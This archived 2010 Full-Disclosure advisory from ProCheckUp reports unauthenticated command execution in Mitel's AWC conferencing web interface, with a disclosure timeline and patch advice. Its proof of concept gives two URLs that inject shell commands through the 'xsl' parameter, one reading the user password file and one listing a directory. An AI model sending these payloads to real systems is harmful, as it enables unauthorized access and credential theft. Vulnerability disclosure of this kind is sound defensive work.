lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4D10CC9E.10602@procheckup.com>
Date: Tue, 21 Dec 2010 15:49:50 +0000
From: research <research@...checkup.com>
To: <vuln@...unia.com>, <full-disclosure@...ts.grok.org.uk>,
	<bugtraq@...urityfocus.com>, <news@...uriteam.com>
Subject: PR10-14 Unauthenticated command execution within
 Mitel's AWC (Mitel Audio and Web Conferencing)

http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14

PR10-14 Unauthenticated command execution within Mitel's AWC (Mitel
Audio and Web Conferencing)

Advisory publicly released: Tuesday, 21 December 2010
Vulnerability found: Wednesday, 21 July 2010
Vendor informed: Monday, 26 July 2010
Severity level: High/Critical
Credits
Jan Fry of ProCheckUp Ltd (www.procheckup.com)
Description
Mitel Audio and Web Conferencing (AWC) is a simple, cost-effective and
scalable audio and web conferencing solution supporting upto 200 ports.
http://www.mitel.com/DocController?documentId=26451
ProCheckUp has discovered that the AWC web user interface is vulnerable
to an unauthenticated command execution attack.
Proof of concept
The following demonstrate the command execution flaw:

1) Vulnerable to command execution

To read the user password file
http://target-domain.foo/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26cat%20%22/usr/awc/www/users%22%26


To perform a directory listing
http://target-domain.foo/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26ls%20%22/usr/awc/www/cgi-bin/%22%26


Consequences:
Command execution allows Unix commands to be remotely executed with the
permissions associated with the web service account. No authentication
is required to exploit this vulnerability.
How to fix
Ensure that the latest patches have been installed.
References


Legal
Copyright 2010 ProCheckUp Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited or changed in any way, is attributed
to Procheckup, and provided such reproduction and/or distribution is
performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ